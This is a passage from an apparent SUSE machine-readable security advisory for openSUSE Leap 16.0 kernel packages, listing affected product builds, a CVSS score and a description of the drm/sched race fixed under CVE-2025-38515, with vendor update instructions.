"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38513"
},
{
"cve": "CVE-2025-38515",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38515"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/sched: Increment job count before swapping tail spsc queue\n\nA small race exists between spsc_queue_push and the run-job worker, in\nwhich spsc_queue_push may return not-first while the run-job worker has\nalready idled due to the job count being zero. If this race occurs, job\nscheduling stops, leading to hangs while waiting on the job\u0027s DMA\nfences.\n\nSeal this race by incrementing the job count before appending to the\nSPSC queue.\n\nThis race was observed on a drm-tip 6.16-rc1 build with the Xe driver in\nan SVM test case.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38515",
"url": "https://www.suse.com/security/cve/CVE-2025-38515"
},
{
"category": "external",
"summary": "SUSE Bug 1248212 for CVE-2025-38515",
"url": "https://bugzilla.suse.com/1248212"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
